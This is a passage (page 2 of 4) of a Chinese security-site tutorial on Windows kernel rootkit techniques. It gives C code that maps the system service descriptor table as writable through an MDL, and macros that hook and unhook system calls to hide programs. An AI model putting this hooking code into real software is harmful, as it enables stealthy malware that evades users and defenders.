如何建立内核级钩子控制操作系统实现程序隐身(2)

作者: 宇文出处:51CTO.com　2008-04-18 13:22　砖好评论条　进入论坛

阅读提示：我们知道，应用程序总是离不开系统内核所提供的服务，比如它要使用内存的时候，只要跟操作系统申请就行了，而不用自己操心哪里有空闲的内存空间等问题，实际上，这些问题是由操作系统的内核来代劳的。

内存描述符表(MDL)的作用是将虚拟内存映射成物理页。如果将系统调用表所在内存页的MDL的MDLFlags成员设为MDL_MAPPED_TO_SYSTEM_VA 并且该页面被锁定的话，那么就可以使用内核钩子技术了。以下代码将可以达此目的：

#pragma pack(1)
typedef struct ServiceDescriptorEntry
{
 unsigned int *ServiceTableBase;
 unsigned int *ServiceCounterTableBase;
 unsigned int NumberOfServices;
 unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

PVOID* NewSystemCallTable;
PMDL pMyMDL = MmCreateMdl( NULL,
 KeServiceDescriptorTable.ServiceTableBase,
 KeServiceDescriptorTable.NumberOfServices * 4 );
MmBuildMdlForNonPagedPool( pMyMDL );
pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode );

好了，我们现在可以通过NewSystemCallTable来新建系统调用表了。系统调用表如下图所示。

图1 系统调用表示意图

进行挂钩时，可以使用以下宏：

#define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1)

#define HOOK(functionName, newPointer2Function, oldPointer2Function )  \
 oldPointer2Function = (PVOID) InterlockedExchange( (PLONG)
&NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function)

#define UNHOOK(functionName, oldPointer2Function)  \
 InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)]
 , (LONG)
oldPointer2Function)

使这些宏后，钩子技术会变得更简单，也更安全。因为InterlockedExchange 是原子函数，不会要求中止中断，所以交换指针的方式是安全的；另外，它也不需要用一个宏挂钩之后用另一个宏卸载钩子，所以也更方便。下图向我们展示了拦截系统调用表的过程。

图2 系统调用表拦截技术示意图

系统调用表数据结构KeServiceDescriptorTable不仅含有ntdll.dll 的全部函数指针，还存有系统调用表的基地址和表的大小，当建立我们自己的内存描述符表的时候，这些信息是不可或缺的。利用MDL_MAPPED_TO_SYSTEM_VA 标志，我们可以建立一个不可页出（即不会被换到内存之外）的MDL ，这样我们就可以将其锁定，并把返回的地址用于我们自己的系统调用表，重要的是，这个系统调用表是可写的。

共4页: 上一页 [1] 2 [3] [4] 下一页

【内容导航】

第 1 页：系统调用表	第 2 页：内存保护
第 3 页：定义钩子函数	第 4 页：内核函数系列

关于 Rootkit 内核钩子安全的

文章

博文

帖子

· Rootkit隐形技术入门(03/20)

· 安全专家警告Rootkit技术并不是唯一威胁(08/08)

· 了解Linux系统内核安全的入侵侦察系统(07/18)

· 从Linux内核的漏洞角度考虑系统安全(07/18)

· LINUX内核2.4.x的网络安全框架(06/21)

· 安全策略新角度：细看本地权限之争

· 4月第4周安全回顾 IIS服务器存漏洞汇丰银行丢..

· 当前ISP架构及安全

· 网络安全专家支招防范黑客攻击九大方法

· 去掉串口硬盘的安全删除硬件图标

· CISCO CCIE ，微软MCSE，安全CISSP 等视频，绝..

· CISCO CCIE ，微软，安全CISSP 等视频，绝对经..

· symantec 安全服务网关6100

专题

我也说两句

叫好

拍砖

中国领先的 IT 技术网站 ·
技术成就梦想

·NAC安全访问控制
·简单驱动编写与windbg调试

· 我们不在沉默给入侵黑..
· 如何最有效地保护中小..
· 网络安全预防措施了解..
· 企业如何进行计算机取..
· 发现新病毒 ntldr.exe ..
· J0ker的CISSP之路：系..

· 专家观点：再谈统一的..
· 黑客如何查找互联网网..
· 提高web2.0的安全性的..
· CISCO CCIE ，微软MCSE..
· CISCO CCIE ，微软MCSE..
· CISCO CCIE ，微软，安..

排行榜

·ARP攻击防范与解决方案 (查看270088次)
·ARP病毒攻击技术分析与防御 (查看44389次)
·网络嗅探教程：使用Sniffer Pro.. (查看40078次)
·远程控制软件VNC教程和对内网机.. (查看38524次)
·2007年八款高性价比杀毒软件对.. (查看37422次)

·ARP攻击防范与解决方案 (581个砖)
·51CTO安全专访：信息安全的基石—安全操作系统 (443个砖)
·51CTO调查：七成技术人员不相信“可杀未知病毒” (431个砖)
·身份认证技术 (187个砖)
·病毒查杀专题 (168个砖)

·清除流氓软件——51CTO特别专题 (707个好)
·ARP攻击防范与解决方案 (543个好)
·51CTO调查：七成技术人员不相信“可杀未知病毒” (484个好)
·51CTO安全专访：信息安全的基石—安全操作系统 (461个好)
·深入了解PGP加密技术 (200个好)

·见证中国网络安全二十年 (04月)
·NAC安全访问控制 (04月)
·安全防范与策略 (12月)
·网络技术经典基础教程 (09月)
·CISSP认证成长之路 (09月)

·首届中国IT工程师生态调查十大发现
·全国软考模拟测试之系统分析师

· Sun发布新模块化磁带库..
· 化解无线网络中的IP地..
· 上周安全回顾:IIS系统..
· 财力人手紧缺中小企业..
· 80后已成中国黑客主流 ..
· 体验Spring的IoC容器对..
· FTP用户权限/站点权限/..
· 通过流量监控快速判断..

· 黑客称有新招黑掉Oracl..
· 系统分析师专家模拟自测
· 调查显示超八成IT人有..
· 山东淄博推8M超级ADSL..
· 微软致雅虎收购最后通..
· 上周回顾:中国网民居全..
· TD芯片商凯明濒临倒闭 ..
· H3C独家纵横字谜游戏 ..

订阅技术快讯

电子杂志下载

名称：SQL Server数据库管理精品黄皮书
简介：书中文章经过精挑细选，便于用户能根据自己的实际工作和学习，快速在本书寻找到相关资料。内容涵盖了SQL Server的安装与升级、语句查询、数据备份和恢复、自动化任务、数据同步、数据字典、安全和预防、性能和优化、集群等各方面应用信息，以及DBA管理人员在数据库管理工作中

名称：2007路由技术大全
简介：《2007路由技术大全》由51CTO.com网站特别策划制作，该书包括路由器技术、路由器产品、路由器配置、安全设置、路由器故障处理、路由器密码恢复，以及广大网友在实践使用中的心得经验和技巧文章，内容注重实用性，适用于初学者入门，也适合多年从业者提高，是一本实践和理论完

名称：网络安全精品应用黄皮书
简介：《2007精品网络安全黄皮书》包括了9个大类24个小类， 800余篇文章，内容包含了熊猫烧香病毒、DDOS攻击、ARP病等热点问题的介绍及解决方案。从病毒查杀、防范、系统、数据等各方面的安全设置到黑客技术的了解、防范，涉及到了安全应用的全部领域, 由浅至深内容全面。

专题

最多好

最多砖